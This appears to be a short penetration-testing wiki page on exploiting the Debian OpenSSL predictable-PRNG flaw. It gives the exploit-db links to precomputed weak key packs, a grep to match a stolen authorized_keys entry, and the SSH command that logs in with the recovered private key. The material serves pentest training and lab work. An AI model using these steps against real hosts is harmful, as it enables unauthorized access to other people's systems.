search

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH

https://osandamalith.com/2013/11/16/rooting-pwnos/

https://www.exploit-db.com/exploits/5632

https://github.com/g0tmi1k/debian-ssh

On the target host, we find it with seeing blacklist rsa, blacklist dsa keys files, or checking version of openssl.

$ openssl
> version

Since the random number generator does not work as it should, the generated keys are exposed to brute force.

We had obtained the authorized_keys file from the target machine. This file contains public keys. We will try to find the private key of this key.

We need to specify key method via authorized_keys file. At the beginning of the file we can see the method.

For dsa - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5632.tar.bz2arrow-up-right

For ssh-rsa - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2arrow-up-right

After the extracting the zip file, we will get in the directory. We need to select related part of authorized_keys file, then we search it in the directory with grep.

$ grep -rl PUBLIC_KEY_PART *.pub
00005b35764e0b2401a9dcbca5b6b6b5-1390.pub

chmod 600 00005b35764e0b2401a9dcbca5b6b6b5-1390
# For dsa
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-dss -i 00005b35764e0b2401a9dcbca5b6b6b5-1390 -o PasswordAuthentication=no test@192.168.1.2
PreviousSudo <=1.8.14NextDocker

Last updated